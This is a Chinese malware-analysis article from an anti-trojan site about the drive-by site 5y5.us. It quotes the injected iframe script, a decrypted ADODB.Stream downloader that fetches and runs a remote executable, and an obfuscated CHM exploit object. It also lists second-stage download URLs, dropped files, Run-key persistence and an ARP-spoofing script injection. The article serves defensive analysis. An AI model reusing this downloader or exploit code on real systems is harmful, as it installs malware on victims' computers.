载入中…

 | 网站首页 | 文章中心 | 下载中心 | 图片中心 | 反木马论坛 |日志分析|样本上传|求助| | 

您现在的位置: 反木马在线 >> 文章中心 >> 流氓软件 >> 文章正文
5y5.us流氓软件分析
作者:佚名    文章来源:不详    点击数:    更新时间:2008-2-4

近期很流行的一个毒网哈,下载的病毒可以进行arp欺骗,晚上测试了一下,感觉跟前些日子的4255.biz差不多。

进入5y5.us这个网站之后

可以看见如下代码

<script language='JavaScript' type='text/JavaScript' src='http://5y5.us/w.js'></script>
<script src='http://s94.cnzz.com/stat.php?id=495247&web_id=495247' language='JavaScript' charset='gb2312'></script>

下载http://5y5.us/w.js到本机

w.js内容

function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=killav;expires="+ Then.toGMTString();
document.writeln("<iframe src=Http:\/\/5y5.us\/1\/001.htm width=100 height=0><\/iframe> ");
document.writeln("<iframe src=Http:\/\/5y5.us\/2\/002.htm width=0 height=0><\/iframe> ");
document.writeln("<iframe src=Http:\/\/5y5.us\/3\/003.htm width=0 height=0><\/iframe> ");
}
}Get();

http://5y5.us/1/001.htm是一个MS07-017网马 指向Http://5y5.us/1/1.jpg        1.jpg 指向Http://5y5.us/a.exe

002.htm是一段加密代码 解密后 function gn(n) {var number = Math.random()*n;
return '~tmp'+Math.round(number)+'.exe';
} try{ dl='Http://5y5.us/a.exe';
      var df=document.createElement("object");
      df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
      var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
      var S=df.CreateObject("Adodb.Stream","");
      S.type=1;
      x.open("GET", dl,0);
      x.send();
      fname1=gn(10000);
      var F=df.CreateObject("Scripting.FileSystemObject","");
      var tmp=F.GetSpecialFolder(0);
      fname1= F.BuildPath(tmp,fname1);
      S.Open();
      S.Write(x.responseBody);
      S.SaveToFile(fname1,2);
      S.Close();
      var Q=df.CreateObject("Shell.Applicati on","");
      Q.ShellExecute(fname1,"","","open",0);
      } catch(i) {i=1;
}

感谢FlowerCode

指向Http://5y5.us/a.exe

003.htm上面指向一个CHM文件 <html><TITLE>index</TITLE><BODY>

<OBJECT style="display:&#X6E;&#X6F;&#X6E;&#X65;" type="tex&#116&#47&#120&#45&#115&#99&#114iptlet" data="&#X4D;&#X4B;&#X3A;&#X40;&#X4D;&#X53;&#X49;&#X54;Sto&#114&#101&#58&#109&#104tml&#X3A;&#X63;&#X3A;&#X5C;&#X2E;&#X6D;ht&#33Http://5y5.us/3/ccc.html&#X3A;&#X3A;/%6C%65%66t&#46htm"></OBJECT>
</body></html>
同样指向Http://5y5.us/a.exe

a.exe运行后 生成C:\WINDOWS\system\logo_1.exe 调用IE访问http://5y5.us/tj.htm 此网页作统计用

开始logo_1.exe运行的参数是/sleepdown
一段时间后 logo_1.exe /sleepdown激活另一个 参数是/update的logo_1.exe 此时logo_1.exe开始连接网络下载木马
http://35561.com/xinshi.exe
http://35561.com/8.exe
http://35561.com/12.exe
http://35561.com/13.exe
http://35561.com/16.exe
http://35561.com/99.exe
http://35561.com/15.exe
http://35561.com/11.exe分别到C:\Windows\system文件夹

值得一提的是http://35561.com/99.exe这个东西 其他的都是一些小的木马

99.exe运行后生成C:\WINDOWS\TASKMSN.EXE ,C:\WINDOWS\system32\npf_mgm.exe,C:\WINDOWS\system32\npf_mgm.exe,C:\WINDOWS\system32\npf_mgm.exe,C:\WINDOWS\system32\daemon_mgm.exe

C:\WINDOWS\TASKMSN.EXE生成C:\WINDOWS\WPC.DLL和C:\WINDOWS\CMD.DLL

由C:\WINDOWS\WPC.DLL启动cmd.exe 再由cmd.exe分别启动C:\WINDOWS\system32\npf_mgm.exe,C:\WINDOWS\system32\npf_mgm.exe,C:\WINDOWS\system32\npf_mgm.exe 安装了嗅叹器 用于后面的arp欺骗

之后C:\WINDOWS\TASKMSN.EXE启动C:\WINDOWS\CMD.DLL 由cmd.dll对局域网内用户进行arp欺骗

向局域网用户的80端口发送代码 <script src=http://9166.biz/w.js></script>

TASKMSN.EXE不断调用arp /d删除本机IP-MAC绑定

整个过程中释放的文件如下
C:\WINDOWS\system\12.exe
C:\WINDOWS\system\8.exe
C:\WINDOWS\system\99.exe
C:\WINDOWS\system\logo_1.exe
C:\WINDOWS\system\MCIWACE.DRV
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\daemon_mgm.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\NetMonInstaller.exe
C:\WINDOWS\system32\npf_mgm.exe
C:\WINDOWS\system32\packet.dll
C:\WINDOWS\system32\pthreadVC.dll
C:\WINDOWS\system32\rpcapd.exe
C:\WINDOWS\system32\wanpacket.dll
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\CMD.DLL
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\msccrt.exe
C:\WINDOWS\TASKMSN.EXE
C:\WINDOWS\WPC.DLL..

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        <jy83xktwfk><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c0nime.exe>      []
        <82w4yc7wr7jf0kt><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexplorer.exe>      [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<msccrt><C:\WINDOWS\msccrt.exe>      []
        <Kvsc3><C:\WINDOWS\Kvsc3.exe>      []
        <AVPSrv><C:\WINDOWS\AVPSrv.exe>      []
        <InternetEx><C:\WINDOWS\TASKMSN.EXE>      []
服务
[Remote Packet Capture Protocol v.0 (experimental) / rpcapd][Stopped/Manual Start]
      <"C:\Program Files\WinPcap\rpcapd.exe" -d -f "C:\Program Files\WinPcap\rpcapd.ini"><N/A>
进程
[PID: 1452][C:\WINDOWS\Explorer.EXE]      [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
        [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\zxzo0.dll]      [N/A, ]
        [C:\WINDOWS\system32\Kvsc3.dll]      [N/A, ]
        [C:\WINDOWS\system32\msccrt.dll]      [N/A, ]
        [C:\WINDOWS\system32\AVPSrv.dll]      [N/A, ]

虽然病毒看上去很厉害,但像此类的挂马网站无非是利用Windows的漏洞侵入用户电脑的,所以在日常升级杀毒软件和防火墙的同时,务必要升级你的Windows,打补丁有时比杀毒软件的升级还要重要!!!
发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
 
  • 上一篇文章:

  • 下一篇文章:
    • 相关新闻
    没有相关文章
    论坛新帖
    新 闻 TOP 10
  • 没有热点文章
    		•
    点击申请点击申请点击申请点击申请点击申请点击申请点击申请
    点击申请点击申请点击申请点击申请点击申请点击申请点击申请点击申请
    文字链接: 热门下说网
    Copyright © 2008 FanMuMa.com All Rights Reserved
    客服邮箱:fanmuma#126.com(将#换为@) 站长:Fisco 联系电话:15802671439 联系QQ:337803 
    捍卫属于个人的一切--